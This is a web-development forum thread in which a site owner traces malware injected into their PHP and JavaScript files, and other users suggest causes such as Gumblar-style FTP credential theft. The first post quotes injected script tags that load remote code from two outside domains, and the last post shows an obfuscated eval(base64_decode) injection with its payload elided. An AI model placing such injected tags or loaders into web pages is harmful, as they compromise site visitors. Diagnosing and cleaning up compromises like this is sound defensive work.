Results 1 to 8 of 8

Thread: [RESOLVED] Possible Javascript Injection

  1. #1
    Join Date
    Sep 2007

    resolved [RESOLVED] Possible Javascript Injection

    On uploading files (PHP and javascript) to the server from local machine via dreamweaver, Google Chrome reported the presence of malicious codes (like loto-49) inside the server page. Later when I checked, I found that a
    HTML Code:
    was automatically added at the end of each javascript *.js files. On their removal, the warnings were gone.

    Recently, they again appeared. Between the closure of the head tag (</head>) and the start of the body tag(<body>) the following code is added automatically:
    HTML Code:
    <script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>
    I checked the local files (both PHP and Javascript) and later downloaded the same from the server and re-checked them. But I couldn't find the possible cause or any occurences of the above script code snippet.

    Can anyone throw a light upon? My site is being blacklisted by Chrome.

  2. #2
    Join Date
    Mar 2007
    Could it be coming from the database that is if your site is using a database?
    "Hippies.They're everywhere. They wanna save the earth, but all they do is smoke pot and smell bad."-Cartman

  3. #3
    Join Date
    Sep 2007
    I'm using a database indeed. But the portion where the code is inserted does not contain any database print. The code of the page is like:

    PHP Code:
    <?php require 'template/header.php'?>
    <title>The title</title>
        <?php require 'template/top.php'?>
        <table class="bodytabidx">
        <td class="linktd">
            <?php require 'category_list.php'?>
        <td class="cata_bodytd">
        <div id="disppro">
        <?php require 'product_display.php'?>
    require 'template/footer.php';

  4. #4
    Join Date
    Mar 2007
    Check to see if a user figured out a way to enter info into your database.
    "Hippies.They're everywhere. They wanna save the earth, but all they do is smoke pot and smell bad."-Cartman

  5. #5
    Join Date
    Sep 2007
    But how (and from where) can it be injected in such a place where the actual code is clean (does not have any echo/print/document.write there)?

    Some more details of the error:


  6. #6
    Join Date
    Jan 2010
    Great Britian
    FTP could be another hack, Gumblar works on the princple that the file download offered (usually a pdf) is the infection point and what steals passwords and logins to FTP and then logs in, grabs the index page, modifies it and then uploads back to the server.

    (SO go now, change your login to your server, if that cures it, then consider moving all your development to a separate user account on your computer and keep one user account for web surfing, etc. Safest policy if you work on one machine but also surf from it)


    check with the web host company that they have not done this or if the server has been compromised by a new client, etc. Poor back end security and a buggy PHP and SQL all go miles to helping the hackers.

    Check what PHP and SQL versions your running on. Your hosts running PHP < 5.0 then you possibly are being hacked through PHP itself from a known security bug that allows for server-side hacks to be made. MySQL is another technology that people will hack and inject data in to if they find hackable or exploitable PHP installs.

    So start asking questions of your host and if they have any server-side firewalls, I am not talking about what is on the outside but internals, do they have a firewall policy between servers and networks connected to them or are they an eggs in one basket host? (in it for the money)

  7. #7
    Join Date
    May 2003
    Between Baltimore and DC
    Tell you hosting provider about the problem and they should be able to help you figure it out.

    Tech Author [Ajax In Action, JavaScript: Visual Blueprint] | twitter | linkedin | http://www.pascarello.com

  8. #8
    Join Date
    Sep 2007
    Thanks for your response. Some extra code was added into some PHP files as:

    PHP Code:
    <?php eval(base64_decode('....'); ?>
    Again, a lot of thanks to you all for taking out your time and replying.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
HTML5 Development Center



X vBulletin 4.2.2 Debug Information

  • Page Generation 0.13291 seconds
  • Memory Usage 2,932KB
  • Queries Executed 15 (?)
More Information
Template Usage (34):
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_global_above_footer
  • (1)ad_global_below_navbar
  • (1)ad_global_header1
  • (1)ad_global_header2
  • (1)ad_navbar_below
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)ad_thread_first_post_content
  • (1)ad_thread_last_post_content
  • (2)bbcode_html
  • (2)bbcode_php
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)headinclude_bottom
  • (8)memberaction_dropdown
  • (1)navbar
  • (4)navbar_link
  • (1)navbar_moderation
  • (1)navbar_noticebit
  • (1)navbar_tabs
  • (2)option
  • (8)postbit
  • (8)postbit_onlinestatus
  • (8)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available (6):
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files (26):
  • ./showthread.php
  • ./global.php
  • ./includes/class_bootstrap.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/functions_navigation.php
  • ./includes/class_friendly_url.php
  • ./includes/class_hook.php
  • ./includes/class_bootstrap_framework.php
  • ./vb/vb.php
  • ./vb/phrase.php
  • ./includes/functions_facebook.php
  • ./includes/functions_calendar.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_notice.php
  • ./packages/vbattach/attach.php
  • ./vb/types.php
  • ./vb/cache.php
  • ./vb/cache/db.php
  • ./vb/cache/observer/db.php
  • ./vb/cache/observer.php 

Hooks Called (73):
  • init_startup
  • friendlyurl_resolve_class
  • init_startup_session_setup_start
  • database_pre_fetch_array
  • database_post_fetch_array
  • init_startup_session_setup_complete
  • global_bootstrap_init_start
  • global_bootstrap_init_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • load_show_variables
  • load_forum_show_variables
  • global_state_check
  • global_bootstrap_complete
  • global_start
  • style_fetch
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • strip_bbcode
  • friendlyurl_clean_fragment
  • friendlyurl_geturl
  • forumjump
  • cache_templates
  • cache_templates_process
  • template_register_var
  • template_render_output
  • fetch_template_start
  • fetch_template_complete
  • parse_templates
  • fetch_musername
  • notices_check_start
  • notices_noticebit
  • process_templates_complete
  • friendlyurl_redirect_canonical
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • bbcode_parse_start
  • postbit_imicons
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • memberaction_dropdown
  • tag_fetchbit
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • build_navigation_data
  • build_navigation_array
  • check_navigation_permission
  • process_navigation_links_start
  • process_navigation_links_complete
  • set_navigation_menu_element
  • build_navigation_menudata
  • build_navigation_listdata
  • build_navigation_list
  • set_navigation_tab_main
  • set_navigation_tab_fallback
  • navigation_tab_complete
  • fb_like_button
  • showthread_complete
  • page_templates